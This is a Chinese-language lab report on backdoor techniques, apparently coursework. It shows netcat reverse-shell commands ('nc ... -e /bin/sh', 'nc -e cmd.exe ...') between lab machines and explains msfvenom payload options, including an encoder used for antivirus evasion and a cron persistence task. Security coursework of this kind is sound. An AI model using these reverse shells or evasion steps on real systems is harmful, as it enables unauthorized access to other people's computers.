一、实验内容
1.使用netcat获取主机操作Shell,cron启动
Windows获得Linux Shell
在Windows下使用ipconfig
查看本机IP
win+r
输入cmd
,打开监听 nc
-l -p 1314
在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh
,使用-e选项执行shell程序
Windows成功获得kali的shell,利用ls
,whoami
指令查看相关信息
Linux获得Windows Shell
在kali中使用ifconfig查看IP
打开监听nc -l -p 1314
在Windows中反弹连接kali,nc
-e cmd.exe 192.168.121.133 1314
kali成功获得Windows的命令提示,可运行指令,如dir,ipconfig
使用nc传输数据
Windows下监听1314端口,nc
-l -p 1314
kali反弹连接到Windows的1314端口,nc 172.16.214.132 1314
连接建立成功,双方可以相互传输数据
Meterpreter
-
后门就是一个程序。
-
传统的理解是:有人编写一个后门程序,大家拿来用。后来有人编写一个平台能生成后门程序。这个平台把后门的
基本功能(基本的连接、执行指令), 扩展功能(如搜集用户信息、安装服务等功能), 编码模式, 运行平台, 以及运行参数 全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。
-
典型的平台就包括有:
intersect
Metaspolit的msfvenom指令
Veil-evasion
在下面的任务三中我们就用到了Metaspolit的msfvenom指令
- 参数说明
-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器,用于对shellcode变形,为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
LHOST 是反弹回连的IP
LPORT 是回连的端口
-f 生成文件的类型
>输出到哪个文件
二、实验内容
任务一:使用netcat获取主机操作Shell,cron启动
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。